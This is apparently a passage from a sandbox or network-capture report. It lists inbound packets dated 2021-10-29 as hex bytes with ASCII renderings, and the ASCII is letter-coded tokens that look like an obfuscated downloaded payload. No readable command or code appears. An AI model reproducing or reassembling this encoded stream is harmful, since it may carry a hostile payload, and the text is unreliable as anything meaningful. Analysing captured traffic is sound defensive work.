2021-10-29 18:50:00 UTC	17	IN	Data Raw: 57 4a 20 44 4f 20 71 70 58 20 71 71 70 20 58 70 20 71 45 4d 20 71 71 4a 20 4a 70 44 20 57 71 20 4a 4f 20 4a 70 4a 20 58 6d 20 71 71 44 20 4d 57 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 71 70 20 44 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 45 20 6d 4d 20 57 4f 20 57 6d 20 45 44 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 58 70 20 57 71 20 6d 58 20 57 4f 20 57 70 20 58 6d 20 71 71 6d 20 71 71 45 20 4d 58 20 71 71 4a 20 57 4f 20 6d 4d 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 4a 71 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 6d 20 57 71 20 57 6d 20 58 6d 20 4d 4f 20 71 71 44 20 71 4f 4d 20 71 71 4a 20 6d 4d 20 6d 58 20 57 4f 20 57 6d 20 4d 6d 20 71 71 6d 20 71 71 45 20 71 4f 58 20 71 4f 45 20 4a 20 57 71 20 57 4f 20 45 57 20 58 6d 20 71 Data Ascii: WJ DO qpX qqp Xp qEM qqJ JpD Wq JO JpJ Xm qqD MW qOM qqJ WO qqp D Wm Xm qqm qqE qOM qqJ WE mM WO Wm ED qqm qqE qOM Xp Wq mX WO Wp Xm qqm qqE MX qqJ WO mM WO Wm Xm qqm qJq qOM qqJ WO mm Wq Wm Xm MO qqD qOM qqJ mM mX WO Wm Mm qqm qqE qOX qOE J Wq WO EW Xm q
2021-10-29 18:50:00 UTC	18	IN	Data Raw: 57 57 20 71 71 4a 20 6d 4d 20 57 58 20 57 4f 20 57 6d 20 58 57 20 71 4f 57 20 44 4d 20 71 4f 57 20 71 71 4a 20 71 71 6d 20 6d 4d 20 57 4f 20 57 6d 20 4d 57 20 71 71 6d 20 71 71 45 20 71 4a 6d 20 70 20 71 4a 71 20 6d 4d 20 57 4f 20 6d 58 20 4d 6d 20 71 71 4a 20 4a 44 20 57 4a 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 71 4f 4d 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4f 4a 20 45 4a 20 71 6d 57 20 6d 58 20 57 4f 20 57 6d 20 58 70 20 4a 4d 20 71 4a 4a 20 71 4f 4d 20 71 71 4a 20 57 44 20 44 58 20 70 45 20 57 6d 20 58 6d 20 71 71 57 20 71 4a 71 20 71 4f 71 20 70 71 20 71 71 4f 20 6d 58 20 57 4f 20 44 4f 20 70 58 20 4a 6d 45 20 71 71 4d 20 71 4f 4d 20 4f 20 4a 44 20 71 4f 4d 20 57 4f 20 57 6d 20 4d 6d 20 4d 6d 20 71 4a 71 20 71 4f 45 20 71 4a 4f 20 4d 70 20 71 71 Data Ascii: WW qqJ mM WX WO Wm XW qOW DM qOW qqJ qqm mM WO Wm MW qqm qqE qJm p qJq mM WO mX Mm qqJ JD WJ qqJ WO WX Mp qOM Xm qqm qJE qOJ EJ qmW mX WO Wm Xp JM qJJ qOM qqJ WD DX pE Wm Xm qqW qJq qOq pq qqO mX WO DO pX JmE qqM qOM O JD qOM WO Wm Mm Mm qJq qOE qJO Mp qq
2021-10-29 18:50:00 UTC	20	IN	Data Raw: 4d 20 57 4f 20 57 4f 20 71 71 70 20 4d 57 20 4d 58 20 45 57 20 71 6d 20 57 71 20 6d 4d 20 57 4f 20 57 4f 20 71 45 4f 20 71 71 44 20 71 57 71 20 71 4f 58 20 71 71 4a 20 57 4a 20 44 45 20 6d 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 58 4f 20 4a 70 45 20 71 71 6d 20 57 71 20 6d 58 20 57 6d 20 70 4f 20 58 57 20 71 71 6d 20 71 71 45 20 45 4f 20 70 71 20 6d 44 20 6d 58 20 57 4f 20 44 4f 20 4d 57 20 45 6d 20 44 6d 20 71 4f 58 20 71 71 4a 20 57 4f 20 57 57 20 4d 70 20 6d 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 4d 45 20 71 4a 4f 20 6d 4a 20 70 4d 20 70 45 20 71 58 45 20 71 4a 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 70 44 20 6d 45 20 6d 4a 20 71 58 45 20 71 6d 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 4a 4a 44 20 4a 6d 6d 20 57 4f 20 57 6d 20 58 4f 20 4d 4f Data Ascii: M WO WO qqp MW MX EW qm Wq mM WO WO qEO qqD qWq qOX qqJ WJ DE mO Wm Xm qJO XO JpE qqm Wq mX Wm pO XW qqm qqE EO pq mD mX WO DO MW Em Dm qOX qqJ WO WW Mp mp Xm qqm qJE ME qJO mJ pM pE qXE qJ qqm qqE qOX XW pD mE mJ qXE qm qqm qqE qOX XW JJD Jmm WO Wm XO MO
2021-10-29 18:50:00 UTC	21	IN	Data Raw: 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 45 4a 20 71 4f 4d 20 71 71 4a 20 57 4f 20 4a 45 20 57 71 20 57 6d 20 58 6d 20 4a 44 20 71 71 44 20 71 4f 4d 20 71 71 4a 20 6d 4d 20 6d 58 20 57 4f 20 57 6d 20 4d 6d 20 71 71 6d 20 71 71 45 20 71 4f 58 20 71 71 6d 20 57 4f 20 6d 58 20 57 4f 20 45 20 58 6d 20 71 71 6d 20 71 71 45 20 6d 4a 20 71 71 70 20 57 4f 20 6d 58 20 45 6d 20 57 57 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4a 20 6d 58 20 57 4f 20 57 6d 20 6d 4a 20 71 71 57 20 71 71 45 20 71 4f 4d 20 4a 6d 6d 20 57 71 20 6d 58 20 57 4f 20 57 70 20 58 6d 20 71 71 6d 20 71 71 45 20 4d 58 20 71 71 4a 20 Data Ascii: qqE qOM qqJ WO mX WO Wm Xm qqm EJ qOM qqJ WO JE Wq Wm Xm JD qqD qOM qqJ mM mX WO Wm Mm qqm qqE qOX qqm WO mX WO E Xm qqm qqE mJ qqp WO mX Em WW Xm qqm qJE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WJ mX WO Wm mJ qqW qqE qOM Jmm Wq mX WO Wp Xm qqm qqE MX qqJ
2021-10-29 18:50:00 UTC	22	IN	Data Raw: 70 20 71 71 4a 20 57 4f 20 57 6d 20 4d 70 20 71 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 44 4d 20 6d 4d 20 57 4f 20 6d 58 20 57 44 20 58 4d 20 4d 58 20 71 71 57 20 71 71 45 20 71 4f 45 20 4d 45 20 57 4a 20 57 44 20 70 57 20 57 4f 20 45 58 20 4a 57 57 20 6d 45 20 71 4f 4d 20 71 71 4a 20 57 71 20 4a 71 20 4a 4a 44 20 4a 4f 58 20 58 6d 20 71 71 6d 20 71 71 70 20 44 4d 20 45 71 20 57 4f 20 6d 58 20 57 44 20 44 4d 20 71 4f 58 20 71 71 6d 20 71 71 45 20 71 4f 70 20 70 71 20 71 57 58 20 6d 58 20 57 4f 20 6d 58 20 57 4d 20 45 70 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4d 70 20 58 20 57 71 20 57 6d 20 58 4a 20 4d 4d 20 71 71 57 20 71 4f 71 20 4d 45 20 57 6d 20 6d 70 20 71 4d 71 20 71 4f 58 20 58 6d 20 71 71 6d 20 71 71 44 20 45 4a 20 71 44 4f 20 71 70 6d 20 6d 58 20 Data Ascii: p qqJ WO Wm Mp qp Xm qqm qJE DM mM WO mX WD XM MX qqW qqE qOE ME WJ WD pW WO EX JWW mE qOM qqJ Wq Jq JJD JOX Xm qqm qqp DM Eq WO mX WD DM qOX qqm qqE qOp pq qWX mX WO mX WM Ep qqE qOM qJJ Mp X Wq Wm XJ MM qqW qOq ME Wm mp qMq qOX Xm qqm qqD EJ qDO qpm mX
2021-10-29 18:50:00 UTC	24	IN	Data Raw: 71 20 4a 6d 58 20 57 57 20 71 71 4a 20 57 4f 20 6d 4d 20 4a 70 20 70 4a 20 45 57 20 6d 44 20 4a 70 4a 20 71 4a 4a 20 70 71 20 58 57 20 6d 58 20 57 4f 20 44 4f 20 4d 57 20 71 71 45 20 71 4f 4d 20 4a 6d 45 20 71 71 4f 20 71 4d 71 20 71 4f 44 20 57 4f 20 57 6d 20 58 57 20 58 45 20 71 44 57 20 4a 6d 70 20 71 71 4a 20 57 4f 20 57 4a 20 4a 44 20 71 20 58 6d 20 71 71 6d 20 71 4a 45 20 70 4f 20 45 4a 20 57 4f 20 6d 58 20 57 44 20 70 4f 20 4d 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4d 4a 20 57 4a 20 57 57 20 70 45 20 71 45 4a 20 4d 6d 20 58 4d 20 71 71 70 20 71 4f 44 20 71 4f 4a 20 71 44 58 20 57 58 20 4a 70 44 20 57 70 20 71 71 6d 20 71 45 4a 20 71 71 45 20 71 4f 45 20 4d 4f 20 57 4f 20 6d 4d 20 70 6d 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 45 20 71 71 Data Ascii: q JmX WW qqJ WO mM Jp pJ EW mD JpJ qJJ pq XW mX WO DO MW qqE qOM JmE qqO qMq qOD WO Wm XW XE qDW Jmp qqJ WO WJ JD q Xm qqm qJE pO EJ WO mX WD pO M qqm qqE qOp MJ WJ WW pE qEJ Mm XM qqp qOD qOJ qDX WX JpD Wp qqm qEJ qqE qOE MO WO mM pm Wm Xm qqm qqE qOE qq
2021-10-29 18:50:00 UTC	25	IN	Data Raw: 20 57 4f 20 6d 58 20 57 44 20 44 58 20 6d 4d 20 71 71 70 20 71 71 45 20 4a 4d 20 71 6d 20 6d 6d 20 6d 58 20 57 4f 20 44 4f 20 71 4a 6d 20 71 4f 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4d 70 20 4d 4a 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 6d 70 20 71 4f 4d 20 71 71 4a 20 57 44 20 70 57 20 57 45 20 70 4d 20 4d 6d 20 4d 4f 20 45 70 20 71 4f 4d 20 71 71 4a 20 57 44 20 4a 4d 20 4d 4a 20 70 4d 20 4d 57 20 4d 4f 20 45 70 20 71 4f 4d 20 71 71 4a 20 57 44 20 4a 4d 20 58 45 20 70 4f 20 57 4a 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4d 45 20 57 44 20 4a 6d 20 71 4a 71 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 71 4a 20 71 71 4a 20 57 4f 20 57 58 20 70 70 20 57 58 20 71 4a 6d 20 71 58 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 70 57 20 57 4d 20 4a 44 20 71 4a 57 20 58 6d Data Ascii: WO mX WD DX mM qqp qqE JM qm mm mX WO DO qJm qOM qqE qOM qJJ Mp MJ WO Wm Mm JM mp qOM qqJ WD pW WE pM Mm MO Ep qOM qqJ WD JM MJ pM MW MO Ep qOM qqJ WD JM XE pO WJ qqm qqE qOp ME WD Jm qJq Wm Xm qJO JD qJ qqJ WO WX pp WX qJm qX qqE qOM qJJ pW WM JD qJW Xm
2021-10-29 18:50:00 UTC	26	IN	Data Raw: 70 4f 20 71 6d 71 20 71 71 6d 20 71 71 45 20 71 4f 45 20 58 58 20 57 44 20 6d 58 20 57 4f 20 4a 4d 20 58 45 20 71 71 58 20 4a 44 20 71 70 70 20 71 71 70 20 57 4f 20 57 6d 20 4a 6d 20 57 6d 20 45 71 20 44 44 20 71 4a 44 20 71 4f 4d 20 4d 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 71 71 20 58 58 20 70 4d 20 6d 58 20 57 4f 20 6d 58 20 70 58 20 6d 57 20 71 71 70 20 71 4f 4d 20 4f 20 4a 44 20 4a 70 70 20 57 4f 20 57 6d 20 58 4a 20 4d 4f 20 71 4a 44 20 71 4f 4d 20 71 71 4a 20 4a 57 20 57 71 20 57 6d 20 57 71 20 4d 4f 20 71 71 58 20 71 4a 70 20 71 4f 6d 20 71 4a 44 20 57 4a 20 44 4a 20 57 70 20 57 44 20 4d 4a 20 71 4a 6d 20 71 4a 6d 20 4d 4d 20 71 4a 4a 20 4d 70 20 4a 4f 6d 20 57 71 20 57 6d 20 58 4a 20 58 58 20 45 20 71 71 71 Data Ascii: pO qmq qqm qqE qOE XX WD mX WO JM XE qqX JD qpp qqp WO Wm Jm Wm Eq DD qJD qOM MJ WO mX WO Wm Xm qqm qqE qqq XX pM mX WO mX pX mW qqp qOM O JD Jpp WO Wm XJ MO qJD qOM qqJ JW Wq Wm Wq MO qqX qJp qOm qJD WJ DJ Wp WD MJ qJm qJm MM qJJ Mp JOm Wq Wm XJ XX E qqq
2021-10-29 18:50:00 UTC	28	IN	Data Raw: 57 20 4d 58 20 6d 6d 20 71 4f 71 20 71 4f 4a 20 6d 57 20 70 4a 20 4a 44 20 58 4d 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4f 44 20 71 4f 4a 20 57 4d 20 70 58 20 57 70 20 71 58 6d 20 44 71 20 71 4a 4a 20 4a 57 71 20 6d 20 6d 71 20 4a 44 20 4d 57 20 57 4f 20 57 6d 20 4d 6d 20 71 20 71 4f 4a 20 71 4f 4d 20 71 71 4a 20 57 4a 20 57 71 20 57 4a 20 70 6d 20 4d 70 20 71 4a 4a 20 4a 44 20 45 45 20 71 71 4a 20 57 4f 20 57 6d 20 70 70 20 57 4f 20 71 70 58 20 71 71 4d 20 58 70 20 71 45 4d 20 71 71 4a 20 70 58 20 4a 44 20 70 57 20 57 4f 20 71 4a 44 20 71 71 6d 20 71 71 45 20 71 4f 58 20 4d 44 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 45 6d 20 71 71 6d 20 71 45 20 4a 70 4d 20 71 71 4a 20 6d 4d 20 44 70 20 57 4f 20 57 6d 20 58 57 20 71 4f 57 20 44 4d 20 71 4f 4a 20 71 71 4a Data Ascii: W MX mm qOq qOJ mW pJ JD XM Xm qqm qJE qOD qOJ WM pX Wp qXm Dq qJJ JWq m mq JD MW WO Wm Mm q qOJ qOM qqJ WJ Wq WJ pm Mp qJJ JD EE qqJ WO Wm pp WO qpX qqM Xp qEM qqJ pX JD pW WO qJD qqm qqE qOX MD WO mX WO Wm Em qqm qE JpM qqJ mM Dp WO Wm XW qOW DM qOJ qqJ
2021-10-29 18:50:00 UTC	29	IN	Data Raw: 20 57 4f 20 6d 58 20 57 44 20 44 71 20 58 44 20 71 71 44 20 45 20 4a 6d 4f 20 71 71 45 20 57 4f 20 44 6d 20 57 70 20 6d 4d 20 4a 71 58 20 4a 45 20 4d 4d 20 44 4d 20 71 4f 45 20 57 4f 20 6d 58 20 57 4a 20 4a 44 20 58 4a 20 71 20 6d 20 71 4f 4d 20 71 71 4a 20 57 44 20 45 6d 20 57 4a 20 4a 58 20 45 71 20 44 44 20 71 4a 45 20 71 4f 4d 20 4a 6d 71 20 57 4f 20 6d 58 20 57 4f 20 70 57 20 58 6d 20 71 71 6d 20 71 4f 4f 20 71 71 71 20 71 71 57 20 44 6d 20 71 70 57 20 57 57 20 57 6d 20 70 44 20 4d 4f 20 58 71 20 71 4f 4d 20 71 71 4a 20 57 4a 20 70 58 20 4a 44 20 44 4d 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4f 70 20 71 71 58 20 4a 44 20 45 4f 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 71 20 71 71 4d 20 71 71 4d 20 4a 57 70 20 70 45 20 6d 58 20 57 4f 20 6d 57 20 71 71 70 20 Data Ascii: WO mX WD Dq XD qqD E JmO qqE WO Dm Wp mM JqX JE MM DM qOE WO mX WJ JD XJ q m qOM qqJ WD Em WJ JX Eq DD qJE qOM Jmq WO mX WO pW Xm qqm qOO qqq qqW Dm qpW WW Wm pD MO Xq qOM qqJ WJ pX JD DM Xm qqm qJE qOp qqX JD EO WO Wm Mm qJq qqM qqM JWp pE mX WO mW qqp
2021-10-29 18:50:00 UTC	30	IN	Data Raw: 71 70 20 71 44 4a 20 71 70 57 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 6d 20 57 20 57 6d 20 58 6d 20 71 4a 4f 20 44 20 58 57 20 71 71 4a 20 57 4f 20 57 58 20 4a 44 20 58 58 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 71 71 20 70 71 20 44 44 20 6d 58 20 57 4f 20 44 4f 20 58 45 20 71 71 58 20 4d 70 20 45 6d 20 71 71 4a 20 57 4f 20 57 6d 20 4d 70 20 58 45 20 58 6d 20 71 71 6d 20 71 4a 45 20 45 71 20 71 71 4a 20 57 4f 20 6d 70 20 4a 20 57 70 20 58 6d 20 71 71 71 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 70 70 20 6d 58 20 57 4f 20 70 4d 20 58 44 20 4d 6d 20 71 71 70 20 71 71 71 20 4a 57 6d 20 70 71 20 57 4a 20 70 58 20 44 4f 20 71 70 58 20 4d 58 20 71 71 4d 20 71 4f 57 20 71 71 57 20 4a 44 20 45 6d 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 4f 20 71 45 71 20 71 4f 6d 20 58 44 Data Ascii: qp qDJ qpW qOM qqJ Wm Jm W Wm Xm qJO D XW qqJ WO WX JD XX Xm qqm qJE qqq pq DD mX WO DO XE qqX Mp Em qqJ WO Wm Mp XE Xm qqm qJE Eq qqJ WO mp J Wp Xm qqq qqE qOM qqJ pp mX WO pM XD Mm qqp qqq JWm pq WJ pX DO qpX MX qqM qOW qqW JD Em WO Wm Mm qJO qEq qOm XD
2021-10-29 18:50:00 UTC	32	IN	Data Raw: 4a 70 4a 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 71 45 44 20 58 6d 20 71 71 6d 20 71 4a 45 20 45 57 20 71 71 4d 20 70 45 20 71 4f 6d 20 57 45 20 6d 4d 20 58 44 20 4a 4d 20 4a 6d 71 20 71 4f 4d 20 71 71 4a 20 57 44 20 4a 20 4a 4a 45 20 6d 58 20 57 4d 20 4a 6d 57 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 6d 20 4a 20 6d 58 20 70 4f 20 70 71 20 71 71 6d 20 71 71 45 20 71 4f 70 20 58 58 20 70 4f 20 6d 58 20 57 4f 20 6d 58 20 71 4a 44 20 44 6d 20 4d 70 20 71 70 20 71 71 4a 20 57 4f 20 57 58 20 6d 58 20 58 4d 20 57 70 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4d 4f 20 57 4f 20 6d 58 20 6d 71 20 44 20 58 44 20 71 71 6d 20 4d 6d 20 71 4f 4d 20 71 71 4a 20 57 4f 20 57 6d 20 57 4f 20 57 6d 20 44 4d 20 71 71 4a 20 4d 70 20 58 71 20 71 71 4a 20 57 4f 20 57 58 20 70 4f Data Ascii: JpJ qqJ WO WX Mp qED Xm qqm qJE EW qqM pE qOm WE mM XD JM Jmq qOM qqJ WD J JJE mX WM JmW qqE qOM qJJ Jm J mX pO pq qqm qqE qOp XX pO mX WO mX qJD Dm Mp qp qqJ WO WX mX XM Wp qqm qqE qOp MO WO mX mq D XD qqm Mm qOM qqJ WO Wm WO Wm DM qqJ Mp Xq qqJ WO WX pO
2021-10-29 18:50:00 UTC	33	IN	Data Raw: 71 44 20 71 71 58 20 44 6d 20 6d 58 20 6d 58 20 70 45 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 4f 20 71 4f 4d 20 71 71 4a 20 70 57 20 57 4f 20 45 70 20 57 4a 20 58 6d 20 71 71 6d 20 71 71 70 20 71 71 4f 20 70 71 20 57 6d 20 6d 4d 20 57 4f 20 6d 58 20 44 45 20 71 4a 4f 20 71 45 71 20 71 4f 6d 20 58 44 20 70 44 20 57 58 20 4a 70 44 20 57 6d 20 58 4a 20 58 58 20 71 71 45 20 71 4f 58 20 4d 44 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 4f 71 20 71 4a 57 20 71 71 4a 20 57 57 20 44 70 20 57 4f 20 57 6d 20 58 57 20 71 4f 57 20 44 4d 20 71 71 71 20 71 71 4a 20 4a 4f 20 6d 58 20 57 4f 20 57 6d 20 45 4d 20 71 71 6d 20 71 71 45 20 71 4a 6d 20 71 71 57 20 44 57 20 4d 71 20 57 71 20 57 6d 20 58 4a 20 70 57 20 71 71 58 20 71 71 71 20 71 71 20 6d 58 20 Data Ascii: qD qqX Dm mX mX pE Wm Xm qqm qqO qOM qqJ pW WO Ep WJ Xm qqm qqp qqO pq Wm mM WO mX DE qJO qEq qOm XD pD WX JpD Wm XJ XX qqE qOX MD WO mX WO Wm Xm qqm qOq qJW qqJ WW Dp WO Wm XW qOW DM qqq qqJ JO mX WO Wm EM qqm qqE qJm qqW DW Mq Wq Wm XJ pW qqX qqq qq mX
2021-10-29 18:50:00 UTC	34	IN	Data Raw: 20 71 4a 45 20 71 45 4d 20 71 71 45 20 4a 4f 20 70 58 20 57 44 20 4a 70 4a 20 58 6d 20 71 71 44 20 4d 57 20 71 4f 4d 20 71 71 4a 20 57 71 20 70 4a 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 4a 45 20 44 71 20 6d 58 20 57 57 20 57 45 20 58 6d 20 71 71 6d 20 71 71 44 20 71 71 58 20 44 6d 20 6d 58 20 6d 58 20 70 44 20 57 6d 20 58 6d 20 71 71 6d 20 71 4f 57 20 71 4f 4d 20 71 71 4a 20 70 57 20 57 4f 20 45 70 20 57 4a 20 58 6d 20 71 71 6d 20 71 71 70 20 71 71 4f 20 70 71 20 44 70 20 6d 4d 20 57 4f 20 6d 58 20 4d 6d 20 71 45 4a 20 71 71 4a 20 45 57 20 71 4f 4a 20 57 44 20 4a 70 58 20 57 4f 20 6d 58 20 71 4a 44 20 71 71 6d 20 71 71 45 20 71 4f 58 20 4d 44 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 4a 4a 20 4d 58 20 71 Data Ascii: qJE qEM qqE JO pX WD JpJ Xm qqD MW qOM qqJ Wq pJ WO Wm Xm qqm qqE qOM qJE Dq mX WW WE Xm qqm qqD qqX Dm mX mX pD Wm Xm qqm qOW qOM qqJ pW WO Ep WJ Xm qqm qqp qqO pq Dp mM WO mX Mm qEJ qqJ EW qOJ WD JpX WO mX qJD qqm qqE qOX MD WO mX WO Wm Xm qqm qJJ MX q
2021-10-29 18:50:00 UTC	36	IN	Data Raw: 4d 20 71 71 4a 20 71 6d 20 71 71 71 20 71 71 4a 20 57 4f 20 57 4a 20 6d 4d 20 58 4d 20 4d 6d 20 71 71 57 20 71 71 45 20 71 4f 45 20 71 4a 4a 20 4a 70 44 20 57 70 20 4a 4f 20 70 4a 20 4d 6d 20 71 45 4a 20 71 71 45 20 71 4f 45 20 4d 4f 20 57 4f 20 6d 58 20 57 71 20 70 58 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 44 70 20 44 71 20 57 6d 20 58 71 20 71 4a 57 20 71 71 45 20 71 4f 4d 20 71 71 70 20 6d 71 20 4f 20 6d 58 20 57 6d 20 44 44 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 4f 58 20 57 4f 20 6d 58 20 70 57 20 57 4a 20 6d 45 20 71 71 4a 20 71 71 45 20 71 4f 4d 20 71 71 44 20 6d 4d 20 4d 57 20 70 58 20 57 57 20 58 6d 20 71 71 44 20 71 4a 45 20 71 45 4d 20 71 71 45 20 4a 4f 20 70 58 20 57 44 20 4a 70 4a 20 58 6d 20 71 71 44 20 4d 57 Data Ascii: M qqJ qm qqq qqJ WO WJ mM XM Mm qqW qqE qOE qJJ JpD Wp JO pJ Mm qEJ qqE qOE MO WO mX Wq pX Xm qqm qqE qOM qqJ WO Dp Dq Wm Xq qJW qqE qOM qqp mq O mX Wm DD qqm qqE qOM qOX WO mX pW WJ mE qqJ qqE qOM qqD mM MW pX WW Xm qqD qJE qEM qqE JO pX WD JpJ Xm qqD MW
2021-10-29 18:50:00 UTC	37	IN	Data Raw: 6d 58 20 57 4f 20 57 6d 20 44 4d 20 4d 4d 20 71 71 45 20 71 4f 6d 20 71 4a 45 20 57 4f 20 6d 58 20 57 71 20 71 4a 20 58 44 20 71 4f 71 20 4a 44 20 70 44 20 71 71 4a 20 57 4f 20 57 6d 20 6d 58 20 70 4f 20 71 4d 57 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4d 4f 20 57 4f 20 70 57 20 4a 20 57 4a 20 58 6d 20 57 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 45 20 4d 6d 20 6d 4d 20 71 71 71 20 71 71 20 6d 58 20 6d 58 20 57 4f 20 57 4f 20 71 4a 4f 20 45 58 20 71 71 4d 20 4a 4a 20 71 71 6d 20 57 4f 20 6d 58 20 57 6d 20 44 45 20 4a 71 57 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 70 71 20 57 71 20 4a 4f 20 4a 4d 20 58 71 20 4a 4d 20 4a 70 45 20 71 4f 4d 20 71 71 4a 20 57 44 20 57 4f 20 45 70 20 57 4a 20 58 6d 20 71 71 6d 20 71 Data Ascii: mX WO Wm DM MM qqE qOm qJE WO mX Wq qJ XD qOq JD pD qqJ WO Wm mX pO qMW qqm qqE qOp MO WO pW J WJ Xm WX qqE qOM qqJ WO mX WO Wm XE Mm mM qqq qq mX mX WO WO qJO EX qqM JJ qqm WO mX Wm DE JqW qqm qqE qOX XW pq Wq JO JM Xq JM JpE qOM qqJ WD WO Ep WJ Xm qqm q
2021-10-29 18:50:00 UTC	38	IN	Data Raw: 6d 20 58 4a 20 4d 6d 20 71 57 44 20 71 4f 4f 20 4d 4d 20 57 57 20 70 6d 20 57 57 20 44 4d 20 4a 71 44 20 71 71 57 20 71 71 45 20 71 4f 45 20 58 58 20 71 6d 70 20 6d 4d 20 57 4f 20 6d 58 20 45 4f 20 71 71 4d 20 4d 45 20 44 4d 20 71 58 70 20 57 71 20 6d 58 20 57 4a 20 44 4d 20 71 4d 6d 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4d 4d 20 57 4a 20 70 6d 20 57 57 20 44 58 20 71 58 4a 20 71 71 45 20 71 71 45 20 4a 4d 20 58 58 20 71 6d 71 20 6d 4d 20 57 4f 20 6d 58 20 71 4a 45 20 71 4f 44 20 71 71 57 20 4a 20 44 6d 20 57 4f 20 6d 58 20 57 4a 20 4a 45 20 58 4a 20 71 20 4a 71 70 20 71 4f 4d 20 71 71 4a 20 57 44 20 45 6d 20 71 58 20 4a 4a 4a 20 58 45 20 71 71 6d 20 71 71 45 20 44 4d 20 4a 70 4d 20 57 4f 20 6d 58 20 57 44 20 6d 58 20 44 4d 20 71 71 4d 20 71 4f 70 20 71 Data Ascii: m XJ Mm qWD qOO MM WW pm WW DM JqD qqW qqE qOE XX qmp mM WO mX EO qqM ME DM qXp Wq mX WJ DM qMm qqm qqE qOp MM WJ pm WW DX qXJ qqE qqE JM XX qmq mM WO mX qJE qOD qqW J Dm WO mX WJ JE XJ q Jqp qOM qqJ WD Em qX JJJ XE qqm qqE DM JpM WO mX WD mX DM qqM qOp q
2021-10-29 18:50:00 UTC	40	IN	Data Raw: 4a 20 57 4a 20 71 6d 44 20 4a 70 20 6d 45 20 44 6d 20 71 6d 4f 20 71 71 57 20 57 6d 20 71 71 4a 20 57 4f 20 57 6d 20 44 57 20 71 58 70 20 58 6d 20 71 71 6d 20 71 71 57 20 4a 4f 45 20 58 57 20 6d 4f 20 70 44 20 4a 4f 6d 20 6d 58 20 58 20 71 71 6d 20 71 71 45 20 71 4f 45 20 70 20 71 45 4d 20 6d 58 20 57 4f 20 6d 58 20 4a 6d 44 20 58 45 20 71 71 4f 20 71 4a 71 20 71 6d 4a 20 57 4a 20 71 4f 4d 20 57 4f 20 57 6d 20 58 4a 20 71 20 4a 6d 6d 20 71 4f 4d 20 71 71 4a 20 57 4a 20 71 6d 44 20 4a 70 20 6d 4a 20 44 6d 20 71 6d 4f 20 71 71 57 20 57 4f 20 71 71 4a 20 57 4f 20 57 6d 20 44 57 20 71 58 70 20 58 6d 20 71 71 6d 20 71 71 57 20 4a 4f 45 20 58 57 20 6d 45 20 70 44 20 4a 4f 6d 20 6d 58 20 57 4a 20 71 71 6d 20 71 71 45 20 71 4f 45 20 70 20 71 45 4d 20 6d 58 20 57 Data Ascii: J WJ qmD Jp mE Dm qmO qqW Wm qqJ WO Wm DW qXp Xm qqm qqW JOE XW mO pD JOm mX X qqm qqE qOE p qEM mX WO mX JmD XE qqO qJq qmJ WJ qOM WO Wm XJ q Jmm qOM qqJ WJ qmD Jp mJ Dm qmO qqW WO qqJ WO Wm DW qXp Xm qqm qqW JOE XW mE pD JOm mX WJ qqm qqE qOE p qEM mX W
